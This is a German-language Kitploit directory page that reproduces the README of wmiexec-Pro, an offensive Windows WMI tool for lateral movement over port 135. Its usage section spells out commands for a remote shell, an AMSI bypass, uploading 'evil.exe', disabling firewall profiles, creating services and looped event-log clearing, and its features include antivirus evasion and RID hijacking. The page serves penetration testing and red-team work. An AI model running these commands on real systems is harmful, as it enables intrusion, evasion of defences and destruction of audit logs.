Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
wmiexec-Pro — Neue Generation von wmiexec.py | Kitploit
Tools/GitHubGitHub/xiaolichan/wmiexec-pro
Privilege EscalationPersistenzmechanismenLaterale BewegungInformationsbeschaffungPost-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubxiaolichan/wmiexec-pro

wmiexec-Pro

Neue Generation von wmiexec.py

Repository anzeigen
1.3k15119vor 6 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

wmiexec-Pro

Neue Generation von wmiexec.py.

Inhaltsverzeichnis

  1. Info
  2. Besonderer Dank
  3. Funktionen
  4. Erste Schritte
    • Installation
  5. Verwendung
  6. Screenshots
  7. Wie funktioniert es?
  8. Haftungsausschluss
  9. Referenzen

Info

Die neue Generation von wmiexec.py bietet viele neue Funktionen. Alle Vorgänge funktionieren ausschließlich über Port 135 (keine SMB-Verbindung erforderlich) zur AV-Umgehung bei Lateral Movement (Windows Defender, HuoRong, 360)

(nach oben)

Besonderer Dank

@422926799

(nach oben)

Funktionen

  • Hauptfunktion: AV-Umgehung
  • Hauptfunktion: win32_process wird nicht benötigt
  • Hauptfunktion: Nur Port 135 erforderlich.
  • Neues Modul: AMSI-Bypass
  • Neues Modul: Dateiübertragung
  • Neues Modul: Remote-Aktivierung von RDP über die WMI-Klassenmethode
  • Neues Modul: Missbrauch der Windows-Firewall
  • Neues Modul: Wiederholte Bereinigung des Ereignisprotokolls
  • Neues Modul: Remote-Aktivierung von WinRM ohne Verwendung von CMD
  • Neues Modul: Dienstverwaltung
  • Neues Modul: RID-Hijack
  • Verbesserung: Befehlsausgabe auf neue Weise abrufen
  • Verbesserung: VBS-Dateien ausführen

(nach oben)

Erste Schritte

Installation

Es wird nur die neueste Version von Impacket benötigt

  1. Impacket-Repository klonen
    git clone https://github.com/fortra/impacket
    
  2. Impacket installieren
    cd impacket && sudo pip3 install .
    
  3. Viel Spaß damit :)
    git clone https://github.com/XiaoliChan/wmiexec-Pro
    

(nach oben)

Verwendung

python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h

Basic enumeration:
   python3 wmiexec-pro.py administrator:[email protected] enum -run

Enable/disable amsi bypass:
   python3 wmiexec-pro.py administrator:[email protected] amsi -enable
   python3 wmiexec-pro.py administrator:[email protected] amsi -disable

Execute command:
   python3 wmiexec-pro.py administrator:[email protected] exec-command -shell (Launch a semi-interactive shell)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" (Default is with output mode)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -silent (Silent mode)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -silent -old (Slient mode in old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -old (With output in old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -save (With output and save output to file)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -old -save
   python3 wmiexec-pro.py administrator:[email protected] exec-command -clear (Remove temporary class for command result storage)
   
Filetransfer:
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (Upload file over 512KB)
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (Download file over 512KB)
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -clear (Remove temporary class for file transfer)
   
RDP:
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable (Auto configure firewall)
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable -old (For old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable-ram (Enable Restricted Admin Mode for PTH, not support old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable -old (For old version OS, such as server 2003, not support old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable-ram (Disable Restricted Admin Mode)

WinRM (Only support win7+):
   python3 wmiexec-pro.py administrator:[email protected] winrm -enable
   python3 wmiexec-pro.py administrator:[email protected] winrm -disable

Firewall (Only support win8+):
   python3 wmiexec-pro.py administrator:[email protected] firewall -search-port 445
   python3 wmiexec-pro.py administrator:[email protected] firewall -dump (Dump all firewall rules)
   python3 wmiexec-pro.py administrator:[email protected] firewall -rule-id (ID from search port) -action [enable/disable/remove] (enable, disable, remove specify rule)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile enable (Enable all firewall profiles)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile disable (Disable all firewall profiles)
   
Services:
   python3 wmiexec-pro.py administrator:[email protected] service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe'
   python3 wmiexec-pro.py administrator:[email protected] service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe' -class "Win32_TerminalService" (Create service via alternative class)
   python3 wmiexec-pro.py administrator:[email protected] service -action start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action stop -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action disable -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action auto-start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action manual-start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action getinfo -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action delete -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -dump all-services.json

Eventlog:
   python3 wmiexec-pro.py administrator:[email protected] eventlog -risk-i-know (Looping cleaning eventlog)
   python3 wmiexec-pro.py administrator:[email protected] eventlog -retrive object-ID (Stop looping cleaning eventlog)
Tool herunterladen